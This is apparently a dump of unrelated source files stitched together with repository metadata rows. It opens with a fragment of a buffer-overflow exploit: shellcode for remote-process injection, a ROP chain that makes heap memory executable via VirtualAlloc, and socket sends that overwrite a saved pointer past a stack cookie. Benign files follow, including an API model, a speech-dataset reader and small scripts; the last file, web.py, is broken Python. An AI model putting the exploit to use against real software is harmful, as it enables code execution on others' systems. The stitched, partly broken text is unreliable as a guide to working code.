shellcode += egg.nut_asm("push 0x1000")
shellcode += egg.nut_asm("push %s" % hex(len(sc_msgbox)))
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push [ebp + 40]")
shellcode += egg.nut_asm("call ebx") # VirtuallAllocEx(handle, 0, len(winexec), 0x1000, 0x40)
shellcode += egg.nut_asm("mov [ebp + 44], eax") # remote_mem
shellcode += egg.nut_asm("mov ebx, [ebp + 24]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push %s" % hex(len(sc_msgbox)))
shellcode += egg.nut_asm("push %s" % hex(egg_heap+0x2A3))
shellcode += egg.nut_asm("push eax")
shellcode += egg.nut_asm("push [ebp + 40]")
shellcode += egg.nut_asm("call ebx")
shellcode += egg.nut_asm("mov ebx, [ebp + 28]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push [ebp + 44]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push [ebp + 40]")
shellcode += egg.nut_asm("call ebx")
shellcode += egg.nut_asm("mov eax, [ebp + 12]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("call eax")
shellcode += "\x90"*10
shellcode += sc_msgbox
		# ROP chain: call VirtualAlloc(egg_heap, 0x1000, 0x1000 /*commit*/,
		# 0x40 /*PAGE_EXECUTE_READWRITE*/) -- making the egg chunk
		# executable -- and return into the NOP sled at egg_heap+30,
		# followed by the sled and the injector shellcode.
		rop = p (virtualAlloc)
		rop += p (egg_heap + 30)
		rop += p (egg_heap)
		rop += p (0x1000)
		rop += p (0x1000)
		rop += p (0x40)
		rop += p (egg_heap + 30)
		rop += "\x90"* 10
		rop += shellcode
		# Announce two large payload sizes, then send the ROP + shellcode;
		# the second record overwrites a saved pointer (presumably the
		# return address -- the pivot gadget is taken at kernel32+0x2e170;
		# confirm against the target binary).
		s.send(cookie + p(0x468) + p(0x1000) + "\x90"*(0x200 - (8 + len(cookie))))
		s.send(rop + "\x90"*(1092 - len(rop)) + cookie + "B"*(0x468 - 1096 - 8) + p(kernelBase+0x2e170) + "BBBB" )
		s.send(rop + "B"*(0x1000 - len(rop)))
	if i > 3:
		# Remaining rounds: over-long record (0x1000+1 bytes announced as
		# 0x1000) to trigger the overflow path.
		s.send(cookie + p(0x1000) + p(0x1) + "\x90"*(0x200 - (8 + len(cookie))))
		s.send("A"*(0x1000 + 1))
| [
"kalianon2816@gmail.com"
] | kalianon2816@gmail.com |
4cf9b4ddf5b75a0c24363f4cabbb4a2c429cd06e | 1d9e681b204e6ec2d7a710ef45b7dec082239491 | /venv/Lib/site-packages/od_python/models/inline_response_200_23.py | be19e551a11c272b3e2fa1c510c9a94e50aeca25 | [] | no_license | 1chimaruGin/DotaAnalysis | 0e0b85805cc83e4cc491d46f7eadc014e8d6b1f1 | 6a74cde2ee400fc0dc96305203d60c5e56d7ecff | refs/heads/master | 2020-07-21T20:48:07.589295 | 2019-09-07T12:20:15 | 2019-09-07T12:20:15 | 206,972,180 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,972 | py | # coding: utf-8
"""
OpenDota API
# Introduction The OpenDota API provides Dota 2 related data including advanced match data extracted from match replays. Please keep request rate to approximately 1/s. **Begining 4/22/2018, the OpenDota API will be limited to 50,000 free calls per month.** We'll be offering a Premium Tier with unlimited API calls and higher rate limits. Check out the [API page](https://www.opendota.com/api-keys) to learn more.
OpenAPI spec version: 17.6.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class InlineResponse20023(object):
    """Swagger model: games played / wins for one match-duration bucket.

    NOTE: originally auto generated by the swagger code generator program;
    hand-edited only to replace the ``six.iteritems`` shim with
    ``dict.items()``, which works on both Python 2 and 3 and drops the
    third-party dependency for this class.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the definition.
    """
    swagger_types = {
        'duration_bin': 'str',
        'games_played': 'int',
        'wins': 'int'
    }

    attribute_map = {
        'duration_bin': 'duration_bin',
        'games_played': 'games_played',
        'wins': 'wins'
    }

    def __init__(self, duration_bin=None, games_played=None, wins=None):
        """InlineResponse20023 - a model defined in Swagger."""
        self._duration_bin = None
        self._games_played = None
        self._wins = None

        if duration_bin is not None:
            self.duration_bin = duration_bin
        if games_played is not None:
            self.games_played = games_played
        if wins is not None:
            self.wins = wins

    @property
    def duration_bin(self):
        """Lower bound of number of seconds the match lasted.

        :rtype: str
        """
        return self._duration_bin

    @duration_bin.setter
    def duration_bin(self, duration_bin):
        """Set the lower bound of number of seconds the match lasted."""
        self._duration_bin = duration_bin

    @property
    def games_played(self):
        """Number of games played.

        :rtype: int
        """
        return self._games_played

    @games_played.setter
    def games_played(self, games_played):
        """Set the number of games played."""
        self._games_played = games_played

    @property
    def wins(self):
        """Number of wins.

        :rtype: int
        """
        return self._wins

    @wins.setter
    def wins(self, wins):
        """Set the number of wins."""
        self._wins = wins

    def to_dict(self):
        """Return the model properties as a dict, recursing into nested models."""
        result = {}

        # was: six.iteritems(self.swagger_types) -- dict.items() is
        # equivalent here and portable across Python 2/3.
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Return the string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Return True if both objects are models with equal attributes."""
        if not isinstance(other, InlineResponse20023):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Return True if both objects are not equal."""
        return not self == other
| [
"kyitharhein18@gmail.com"
] | kyitharhein18@gmail.com |
42376b861ece80075b0aeda3fb258441d5be2c61 | 65df0fbd17c7afae6e5073fff818dd28b7d0c4c8 | /assignment1/pythonFiles/getURIRedirect.py | cf7c1e1aca9fa35dfb1f0cacc9e88e32a0f482fe | [
"MIT"
] | permissive | khajamasroorahmed/cs851-s15 | 8ef3e1115425ef050803ba940b00c5f15c2ee14f | 45217f23c7c940543697e355100644252bb90520 | refs/heads/master | 2021-01-18T08:40:13.310490 | 2015-05-02T09:10:38 | 2015-05-02T09:10:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | #CS751 Spring 2015 Offered by Dr. Michael Nelson - Assignment 1
#Filename: getURIRedirect.py
#Author: Khaja Masroor Ahmed
#UIN: 00999044
#CS Email: kahmed@cs.odu.edu
import json
from collections import Counter


def count_uri_redirects(status_codes):
    """Return how many of the given HTTP status codes are redirects (3xx)."""
    return sum(1 for status in status_codes if str(status).startswith('3'))


def main():
    """Read tweet URL status chains from status.txt and report redirect counts.

    Writes one "<redirect count>\t<final URL>" line per URL to
    uriRedirect.txt, and a histogram {redirect_count: n_urls} to
    uriRedirectCount.txt.

    Fixes vs. the original script: files are closed via `with` (the input
    was also opened 'r+' although it is only read), the per-URL redirect
    count no longer accumulates across all URLs of the same input line,
    and the histogram is written once at the end instead of once per line.
    """
    redirect_histogram = Counter()  # redirect count -> number of URLs
    with open('status.txt', 'r') as status_file, \
            open('uriRedirect.txt', 'w') as per_url_file, \
            open('uriRedirectCount.txt', 'w') as histogram_file:
        for line in status_file:
            data = json.loads(line)
            for tweet_data in data['tweetURLData']:
                count = count_uri_redirects(tweet_data['statusCode'])
                per_url_file.write(str(count) + '\t' + tweet_data['finalURL'] + '\n')
                redirect_histogram[count] += 1
        histogram_file.write(str(dict(redirect_histogram)) + '\n')


if __name__ == '__main__':
    main()
| [
"max.bizarre@gmail.com"
] | max.bizarre@gmail.com |
c7bc15d72bb90e5fb7c6d3a794bcdc3c286ee53a | a3926c09872e1f74b57431fbb3e711918a11dc0a | /python/hash_table/1346_check_if_n_and_its_double_exist.py | a5c2c203328d0dbf68510dd50017a7aac7c37ec2 | [
"MIT"
] | permissive | linshaoyong/leetcode | e64297dc6afcebcee0614a153a566323bf223779 | 57080da5fbe5d62cbc0b8a34e362a8b0978d5b59 | refs/heads/main | 2022-09-15T00:05:36.476268 | 2022-08-16T14:09:11 | 2022-08-16T14:09:11 | 196,914,051 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 582 | py | class Solution(object):
def checkIfExist(self, arr):
"""
:type arr: List[int]
:rtype: bool
"""
sa = set()
for a in arr:
if 2 * a in sa or (a % 2 == 0 and a // 2 in sa):
return True
sa.add(a)
return False
def test_check_if_exist():
    """Sanity checks for Solution.checkIfExist covering hits, misses and zeros."""
    solver = Solution()
    assert solver.checkIfExist([10, 2, 5, 3])
    assert solver.checkIfExist([7, 1, 14, 11])
    assert solver.checkIfExist([3, 1, 7, 11]) is False
    assert solver.checkIfExist([-2, 0, 10, -19, 4, 6, -8]) is False
    assert solver.checkIfExist([0, 0])
| [
"linshaoyong@gmail.com"
] | linshaoyong@gmail.com |
120135cf7bd569963888ffe1e1a46f48570cdbf8 | 524f3dfc55411c6bde7d5a0386f33f57adcc7f33 | /ARCTIC_reader.py | 46cb595967edb5664e6bbd6041b7be6a1ca3cace | [] | no_license | socom20/speech-cloner | 776f61b28a35a99bb0ed7606638925d9dbea74b7 | 3ad0828b5419e004a5bf7fe05f94954677e5bdee | refs/heads/master | 2020-05-07T10:42:01.013476 | 2019-07-15T02:21:50 | 2019-07-15T02:21:50 | 180,427,808 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,983 | py | import numpy as np
import matplotlib.pyplot as plt
import os, sys
import librosa
import pickle
import hashlib
import h5py
from collections import namedtuple
from audio_lib import calc_MFCC_input, calc_PHN_target
from sound_ds import Sound_DS
class ARCTIC(Sound_DS):
def __init__(self, cfg_d={}):
self.cfg_d = cfg_d
if 'hop_length' not in self.cfg_d.keys():
self.cfg_d['hop_length'] = int(self.cfg_d['hop_length_ms'] * self.cfg_d['sample_rate'] / 1000.0)
print(" - cfg_d['hop_length'] = {:d}".format(self.cfg_d['hop_length']))
if 'win_length' not in self.cfg_d.keys():
self.cfg_d['win_length'] = int(self.cfg_d['win_length_ms'] * self.cfg_d['sample_rate'] / 1000.0)
print(" - cfg_d['win_length'] = {:d}".format(self.cfg_d['win_length']))
self.ds_path = cfg_d['ds_path']
self.random_seed = cfg_d['random_seed']
self.verbose = cfg_d['verbose']
self.ds_norm = cfg_d['ds_norm']
self.n_mfcc = cfg_d['n_mfcc'] # Cantidad de mfcc en la salida
self.n_timesteps = cfg_d['n_timesteps'] # Cantidad de de pasos temporales para el muestreo window_sampler
if self.random_seed is not None:
np.random.seed(self.random_seed)
self.sample_rate = cfg_d['sample_rate']
self.ds_type_v = np.array(['TRAIN', 'TEST'])
self.ds_dialect_v = np.array(['DR'+str(i) for i in range(1,9)])
self.ds_gender_v = np.array(['M', 'F'])
self.ds_phoneme_43_v = np.array(['b', 'd', 'g', 'p', 't', 'k', # Stops
'jh', 'ch', # Affricates
's', 'sh', 'z', 'zh', 'f', 'th', 'v', 'dh', # Fricatives
'm', 'n', 'ng', # Nasals
'l', 'r', 'w', 'y', 'hh', # Semivowels and Glides
'aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ay', 'eh', 'er', 'ey', 'ih', 'iy', 'ow', 'oy', 'uh', 'uw', # Vowels
'H#', 'pau', 'ssil']) # Others
self.ds_cache_name = cfg_d['ds_cache_name']
phn_mfcc_name_id = hashlib.md5('_'.join([str(cfg_d[k]) for k in ('sample_rate',
'pre_emphasis',
'hop_length',
'win_length',
'n_mels',
'n_mfcc',
'n_fft',
'window',
'mfcc_normaleze_first_mfcc',
'mfcc_norm_factor',
'calc_mfcc_derivate',
'M_dB_norm_factor',
'P_dB_norm_factor',
'mean_abs_amp_norm',
'clip_output')]).encode()).hexdigest()
self.spec_cache_name = '.'.join(cfg_d['spec_cache_name'].split('.')[:-1]) + '_' + phn_mfcc_name_id + '.' + cfg_d['spec_cache_name'].split('.')[-1]
self.ds = None
if not os.path.exists( os.path.join(self.ds_path, self.ds_cache_name) ) or cfg_d['remake_samples_cache']:
self.read_dataset_from_disk(self.verbose)
self.save_dataset_cache()
else:
self.load_dataset_cache()
self._normalize_ds()
self.make_phoneme_convertion_dicts()
if not os.path.exists(os.path.join(self.ds_path, self.spec_cache_name)):
r = ''
while not r in ['y', 'n']:
print(' - ARCTIC, no se encontró el archivo de cache "{}", desea construirlo (y/n):'.format(self.spec_cache_name), end='')
r = input()
if r == 'y':
self.create_spec_cache()
else:
print(' - ARCTIC, no se puede continuar sin generar el archivo de cache.', file=sys.stderr)
return None
return None
def create_spec_cache(self, cfg_d=None):
if cfg_d is None:
cfg_d = self.cfg_d
if os.path.exists(os.path.join(self.ds_path, self.spec_cache_name)):
print(' WARNING, create_spec_cache: el archivo "{}" ya existe, para generarlo de nuevo primero se debe eliminar.', file=sys.stderr)
return None
phn_conv_d = self.phn2ohv
n_samples = len(self.ds['wav'])
print(' - create_spec_cache, Salvando {} cache'.format(self.spec_cache_name))
with h5py.File(os.path.join(self.ds_path, self.spec_cache_name),'w') as ds_h5py:
grp_mfcc = ds_h5py.create_group("mfcc")
grp_mel_dB = ds_h5py.create_group("mel_dB")
grp_power_dB = ds_h5py.create_group("power_dB")
grp_phn = ds_h5py.create_group("phn")
phn_conv_d = self.phn2ohv
for i_sample in range(n_samples):
if self.verbose and i_sample%100==0:
print(' - Saved: {} of {} samples'.format(i_sample, n_samples))
y = self.ds['wav'][i_sample]
phn_v = self.ds['phn_v'][i_sample]
mfcc, mel_dB, power_dB = calc_MFCC_input(y,
sr=cfg_d['sample_rate'],
pre_emphasis=cfg_d['pre_emphasis'],
hop_length=cfg_d['hop_length'],
win_length=cfg_d['win_length'],
n_mels=cfg_d['n_mels'],
n_mfcc=cfg_d['n_mfcc'],
n_fft=cfg_d['n_fft'],
window=cfg_d['window'],
mfcc_normaleze_first_mfcc=cfg_d['mfcc_normaleze_first_mfcc'],
mfcc_norm_factor=cfg_d['mfcc_norm_factor'],
calc_mfcc_derivate=cfg_d['calc_mfcc_derivate'],
M_dB_norm_factor=cfg_d['M_dB_norm_factor'],
P_dB_norm_factor=cfg_d['P_dB_norm_factor'],
mean_abs_amp_norm=cfg_d['mean_abs_amp_norm'],
clip_output=cfg_d['clip_output'])
phn = calc_PHN_target(y, phn_v, phn_conv_d,
hop_length=cfg_d['hop_length'],
win_length=cfg_d['win_length'])
assert mfcc.shape[0] == phn.shape[0], '- ERROR, create_spec_cache: para la muestra {}, mfcc.shape[0] != phn.shape[0]'.format(i_sample)
grp_mfcc.create_dataset( str(i_sample), data=mfcc)
grp_mel_dB.create_dataset( str(i_sample), data=mel_dB)
grp_power_dB.create_dataset(str(i_sample), data=power_dB)
grp_phn.create_dataset( str(i_sample), data=phn)
##
if self.verbose:
print('Archivo "{}" escrito en disco.'.format(self.spec_cache_name))
## ds_h5py['mfcc'][i_sample] = mfcc
## ds_h5py['phn'][i_sample] = phn
return None
def read_dataset_from_disk(self, verbose=False):
self.ds = {'wav': [], # Sound wave
'spk_id': [], # Spreaker Id
'phn_v': [], # Phoneme list
'sts_id': []} # Sentence id
if verbose:
print(' - ARCTIC, read_dataset_from_disk, leyendo ARCTIC dataset desde:'.format(self.ds_path))
n_samples = 0
for spk_dir in os.listdir(self.ds_path):
if verbose:
print(' - ARCTIC, read_dataset_from_disk, leyendo: "{}"'.format(spk_dir))
if os.path.isdir( os.path.join(self.ds_path, spk_dir) ):
spk_id = spk_dir.split('_')[-2]
abs_spk_dir = os.path.join(self.ds_path, spk_dir)
wav_dir = os.path.join(abs_spk_dir, 'wav')
phn_dir = os.path.join(abs_spk_dir, 'lab')
for wav_file_name in sorted( os.listdir(wav_dir) ):
if len(wav_file_name) > 3 and wav_file_name[-4:] == '.wav':
sts_id = wav_file_name.split('_')[-1].split('.')[0]
abs_wav_file_name = os.path.join(wav_dir, wav_file_name)
abs_phn_file_name = os.path.join(phn_dir, wav_file_name.replace('wav', 'lab'))
wav = self.read_wav(abs_wav_file_name)
phn_v = self.read_phn(abs_phn_file_name)
self.ds['wav'].append(wav)
self.ds['phn_v'].append(phn_v)
self.ds['spk_id'].append(spk_id)
self.ds['sts_id'].append(sts_id)
n_samples += 1
for k in self.ds.keys():
self.ds[k] = np.array(self.ds[k])
if verbose:
print(' - ARCTIC, read_dataset_from_disk, DateSet leido ARCTIC, cantidad de archivos leidos: {}'.format(n_samples))
return None
def read_wav(self, file_path='./TEST/DR1/FAKS0/SA1.WAV'):
y, sr = librosa.load(file_path, sr=self.sample_rate)
return y
def read_phn(self, file_path='./TEST/DR1/FAKS0/SA1.PHN'):
with open(file_path , 'r') as f:
ml_v = f.readlines()
phn_v = []
last = 0
for ml in ml_v:
l_v = ml.strip().split()
if len(l_v) == 3:
phn_v.append( (last, int(self.sample_rate*float(l_v[0])), l_v[2]) )
last = phn_v[-1][1]
return phn_v
def make_phoneme_convertion_dicts(self):
""" Arma los diccionarios de conversión de phonemes según la agrupación que se quiera usar"""
self.phn2ohv = {} # Conversión de phonema_str a one_hot_vector
self.phn2idx = {} # Conversión de phonema_str a index
self.idx2phn = {} # Conversión de index a phonema_str
for idx, phn in enumerate(self.ds_phoneme_43_v):
ohv = np.zeros(len(self.ds_phoneme_43_v))
ohv[idx] = 1.0
self.phn2ohv[phn] = ohv
self.phn2idx[phn] = idx
self.idx2phn[idx] = phn
self.n_phn = len(self.ds_phoneme_43_v)
return None
def window_sampler(self, batch_size=32, n_epochs=1, randomize_samples=True, sample_trn=True, prop_val=0.3, ds_filter_d={'spk_id':['bdl','rms','slt','clb']}, yield_idxs=False):
n_timesteps=self.n_timesteps
f_s = self.get_ds_filter(ds_filter_d)
samples_v = np.arange(f_s.shape[0])[f_s]
samples_v = np.array( [str(i) for i in samples_v] )
if prop_val > 0.0:
np.random.seed(0)# Some seed
idx_v = np.arange(samples_v.shape[0])
np.random.shuffle(idx_v)
n_val = int(prop_val*samples_v.shape[0])
idx_trn = idx_v[:-n_val]
idx_val = idx_v[-n_val:]
if sample_trn:
samples_v = samples_v[idx_trn]
else:
samples_v = samples_v[idx_val]
np.random.seed(self.random_seed)
with h5py.File(os.path.join(self.ds_path, self.spec_cache_name),'r') as ds_h5py:
x_v = []
y_v = []
n_warning = 0
idxs_v = []
for i_epoch in range(n_epochs):
if randomize_samples:
np.random.shuffle(samples_v)
for i_sample in samples_v:
## print('sample', i_sample)
## print(mfcc.shape, phn.shape)
spec_len = ds_h5py['mfcc'][i_sample].shape[0]
if spec_len <= n_timesteps:
# Padding
i_s = 0
i_e = n_timesteps
mfcc = ds_h5py['mfcc'][i_sample][:]
phn = ds_h5py['phn'][i_sample][:]
pad_len = n_timesteps - spec_len
mfcc, phn = self._zero_pad(mfcc, phn, pad_len=pad_len)
# Makeing phoneme target
idx = arctic.phn2idx['pau']
phn[-pad_len:,idx] = 1.0
if n_warning < 5:
print('WARNING: padding!!!'.format(i_sample))
n_warning += 1
else:
# Solamente elegimos un frame por wav
# TODO: llevar la cuenta de los frames elegidos como i_sample asi siempre elegimos uno distinto
i_s = np.random.randint(0, spec_len-n_timesteps)
i_e = i_s + n_timesteps
mfcc = ds_h5py['mfcc'][i_sample][i_s:i_e]
phn = ds_h5py['phn'][i_sample][i_s:i_e]
x_v.append( mfcc )
y_v.append( phn )
idxs_v.append([i_s, i_e, int(i_sample)])
if len(x_v) == batch_size:
x_v = np.array(x_v)
y_v = np.array(y_v)
assert x_v.shape[1] == y_v.shape[1] == n_timesteps
if yield_idxs:
idxs_v = np.array(idxs_v)
yield x_v, y_v, idxs_v
else:
yield x_v, y_v
x_v = []
y_v = []
idxs_v = []
def calc_class_weights(self, clip=(0,10), ds_filter_d={'spk_id':['bdl','rms','slt','clb']}):
f_s = self.get_ds_filter(ds_filter_d)
samples_v = np.arange(f_s.shape[0])[f_s]
samples_v = [str(i) for i in samples_v]
counter_v = None
with h5py.File(os.path.join(self.ds_path, self.spec_cache_name),'r') as ds_h5py:
for i_s in samples_v:
if counter_v is None:
counter_v = np.sum(ds_h5py['phn'][str(i_s)], axis=0)
else:
counter_v += np.sum(ds_h5py['phn'][str(i_s)], axis=0)
n_samples = int(np.sum(counter_v))
majority = np.mean(counter_v)
cw_d = {cls: float(majority/count) if count > 0 else 1.0 for cls, count in enumerate(counter_v)}
if clip is not None:
for k in cw_d.keys():
cw_d[k] = np.clip(cw_d[k], clip[0], clip[1])
return cw_d, n_samples
# 6 119 737
# Manual smoke test: build the ARCTIC reader and visualize a few sampled
# spectrogram windows.  Requires the dataset on local disk.
if __name__ == '__main__':
    import time

    # Dataset location differs between the Windows and Linux dev machines.
    if os.name == 'nt':
        ds_path = r'G:\Downloads\ARCTIC\cmu_arctic'
    else:
        ds_path = '/media/sergio/EVO970/UNIR/TFM/code/data_sets/ARCTIC/cmu_arctic'

    ds_cfg_d = {'ds_path':ds_path,
                'ds_norm':(0.0, 1.0),
                'remake_samples_cache':False,
                'random_seed':0,
                'ds_cache_name':'arctic_cache.pickle',
                'spec_cache_name':'spec_cache.h5py',
                'verbose':True,

                'sample_rate':16000,  # Sampling frequency of the audio files, in Hz
                'pre_emphasis': 0.97,

                'hop_length_ms': 5.0,   # 2.5ms = 40c | 5.0ms = 80c (@ 16kHz)
                'win_length_ms': 25.0,  # 25.0ms = 400c (@ 16kHz)
                'n_timesteps': 400,     # 800ts*(win_length_ms=2.5ms)= 2000ms; number of hop_length_ms steps in a prediction window.

                'n_mels':80,
                'n_mfcc':40,
                'n_fft':None,  # None uses n_fft=win_length
                'window':'hann',
                'mfcc_normaleze_first_mfcc':True,
                'mfcc_norm_factor': 0.01,
                'calc_mfcc_derivate':False,
                'M_dB_norm_factor':0.01,
                'P_dB_norm_factor':0.01,

                'mean_abs_amp_norm':0.003,
                'clip_output':True}

    arctic = ARCTIC(ds_cfg_d)

##    mfcc_batch, phn_v_batch, idxs_v_batch = next(iter(arctic.window_sampler(10, 1, yield_idxs=True, ds_filter_d={'spk_id':'bdl'})))
##    for mfcc, phn_v, idxs_v in zip(mfcc_batch, phn_v_batch, idxs_v_batch):
####        print(idxs_v)
##        arctic.spec_show(mfcc, phn_v, idxs_v)

    # Draw one batch of spectrogram windows and display each one.
    mfcc_batch, mel_batch, stft_batch, idxs_v_batch = next(iter(arctic.spec_window_sampler(50, 1, yield_idxs=True)))
    for mfcc, mel, stft, idxs_v in zip(mfcc_batch, mel_batch, stft_batch, idxs_v_batch):
        print(idxs_v)
        arctic.spec_show(stft, None, idxs_v)
## for i_sample in range(0, len(arctic.ds['wav'])):
## m, _, _ = calc_MFCC_input(arctic.ds['wav'][i_sample])
## p = calc_PHN_target(arctic.ds['wav'][i_sample], arctic.ds['phn_v'][i_sample], arctic.phn2ohv)
##
##
## for a, b, p_str in arctic.ds['phn_v'][i_sample]:
## print('{:5d} -> {:5d} : delta:{:5d} : {}'.format(a//40,b//40, (b-a)//40, p_str))
##
##
## arctic.spec_show(m, p)
##
## break
##
## t0 = time.time()
## n_batch=0
## for mfcc, phn in arctic.window_sampler(batch_size=32, n_epochs=1, ds_filter_d={}):
## n_batch += 1
#### print(mfcc.shape)
#### print(phn.shape)
## print(' Muestreo completo en {:0.02f} s, n_batches={}'.format(time.time() - t0, n_batch))
## for x, y in arctic.phoneme_sampler():
## for i in range(len(x)):
## if np.argmax(y[i]) == np.argmax(arctic.phoneme_d['ae']):
## arctic.play(x[i])
## input()
## for a, b, p in phn_v:
## y_aux = np.concatenate( (np.zeros(arctic.sample_rate), y[a:b] ))
## y_aux = np.concatenate([y_aux,y_aux,y_aux])
## _=plt.plot(y_aux)
## arctic.play_sound(y_aux)
## print(p)
## plt.show()
| [
"49447659+socom20@users.noreply.github.com"
] | 49447659+socom20@users.noreply.github.com |
50a7a10cb9a1aa88a71c786a4b06da91c96801bc | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/anagram/7a7f1153e39747b2922e1c830c65ac0a.py | 23159322f0bf7864d05c50ccb0628b12b1aae17c | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 246 | py | def detect_anagrams(word, possibles):
found = []
for possible in possibles:
if sorted(list(word.lower())) == sorted(list(possible.lower())) and word.lower() != possible.lower():
found.append(possible)
return found
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
528c4a1f5896ec1fbbc0e2b833b6a51ca7381b80 | 17cbe826892d06dc5aee4e4c2a5747e10933f2d0 | /hmtl/modules/text_field_embedders/__init__.py | 233345c6669cbadde24653011c00aa7013aa3810 | [
"MIT"
] | permissive | rahular/joint-coref-srl | 3fdd0e37a56e3be894f3da4ceeb030a599ff4388 | cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be | refs/heads/main | 2023-02-16T21:53:11.721014 | 2021-01-18T15:31:47 | 2021-01-18T15:31:47 | 330,708,579 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | # coding: utf-8
from hmtl.modules.text_field_embedders.shortcut_connect_text_field_embedder import (
ShortcutConnectTextFieldEmbedder,
)
| [
"rahul@di.ku.dk"
] | rahul@di.ku.dk |
9e6a32c74ef8c3f40f7b6e855c2a9e2e658eb9af | a3485f1573fb1d2e9c029e37acf040e0dc669301 | /BackgroundProgram/market/apps/users/migrations/0002_auto_20170704_1624.py | 7db364b0f97898394733c9f0372feede625cd8b9 | [] | no_license | lgb020/SupermarketFastCashier | ac132368695dfcb49af2ed5470e6f5fa5336f451 | 2c6f8987431d305f0a76cbda0625b445224e7d07 | refs/heads/master | 2020-04-25T01:38:54.812102 | 2019-02-21T14:12:31 | 2019-02-21T14:12:31 | 172,414,753 | 0 | 1 | null | 2019-02-25T01:41:51 | 2019-02-25T01:41:51 | null | UTF-8 | Python | false | false | 492 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-04 16:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Meta-only migration: set ordering and verbose names on MobileVerifyRecord."""

    # Must be applied on top of the users app's initial migration.
    dependencies = [
        ('users', '0001_initial'),
    ]

    operations = [
        # No schema change: newest verification codes first, plus localized
        # (Chinese) verbose names for the admin.
        migrations.AlterModelOptions(
            name='mobileverifyrecord',
            options={'ordering': ['-send_time'], 'verbose_name': '电话验证码', 'verbose_name_plural': '电话验证码'},
        ),
    ]
| [
"jpf199727@gmail.com"
] | jpf199727@gmail.com |
224c593b401c1b0ef3ab7e2b9e9e5ccc27c82d6b | 0a2e72ea9c7057296ad666125b9c51983a6d33e6 | /web.py | 4fd39de8a799b6b53ea6cb058f134f552596d3ec | [] | no_license | pavankumarmeruva/python | c417cb8b0d0a1ec776943d0e1308dfa30317eb39 | 6bc10050504018b6f0bdb0f5d5a580671d381d2d | refs/heads/master | 2021-03-08T06:41:32.587899 | 2020-03-31T03:07:34 | 2020-03-31T03:07:34 | 246,327,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,037 | py | #!/usr/bin/python
print "#!/usr/bin/python
print \"
<!doctype html><html lang=\\"en\\"><head><meta charset=\\"utf-8\\"/><link rel=\\"icon\\" href=\\"/favicon.ico\\"/><meta name=\\"viewport\\" content=\\"width=device-width,initial-scale=1\\"/><meta name=\\"theme-color\\" content=\\"#000000\\"/><link rel=\\"apple-touch-icon\\" href=\\"/logo192.png\\"/><link rel=\\"manifest\\" href=\\"/manifest.json\\"/><link rel=\\"apple-touch-icon\\" sizes=\\"180x180\\" href=\\"/apple-touch-icon.png\\"><link rel=\\"icon\\" type=\\"image/png\\" sizes=\\"32x32\\" href=\\"/favicon-32x32.png\\"><link rel=\\"icon\\" type=\\"image/png\\" sizes=\\"16x16\\" href=\\"/favicon-16x16.png\\"><link rel=\\"manifest\\" href=\\"/site.webmanifest\\"><title>COVID-19 Tracker | India</title><meta name=\\"title\\" content=\\"COVID-19 Tracker | India\\"><meta name=\\"description\\" content=\\"Volunteer-driven crowdsourced initiative to track the spread of Coronavirus (COVID-19) in India\\"><meta name=\\"keywords\\" content=\\"coronavirus,corona,covid,covid19,covid-19,covidindia,india,virus\\"><meta property=\\"og:type\\" content=\\"website\\"><meta property=\\"og:url\\" content=\\"https://www.covid19india.org\\"><meta property=\\"og:title\\" content=\\"COVID-19 Tracker | India\\"><meta property=\\"og:description\\" content=\\"Volunteer-driven crowdsourced initiative to track the spread of Coronavirus (COVID-19) in India\\"><meta property=\\"og:image\\" content=\\"/thumbnail.png\\"><meta property=\\"twitter:card\\" content=\\"summary_large_image\\"><meta property=\\"twitter:url\\" content=\\"https://www.covid19india.org\\"><meta property=\\"twitter:title\\" content=\\"COVID-19 Tracker | India\\"><meta property=\\"twitter:description\\" content=\\"Volunteer-driven crowdsourced initiative to track the spread of Coronavirus (COVID-19) in India\\"><meta property=\\"twitter:image\\" content=\\"/thumbnail.png\\"><link href=\\"/static/css/main.efe1529d.chunk.css\\" rel=\\"stylesheet\\"></head><body><noscript>You need to enable JavaScript to run this 
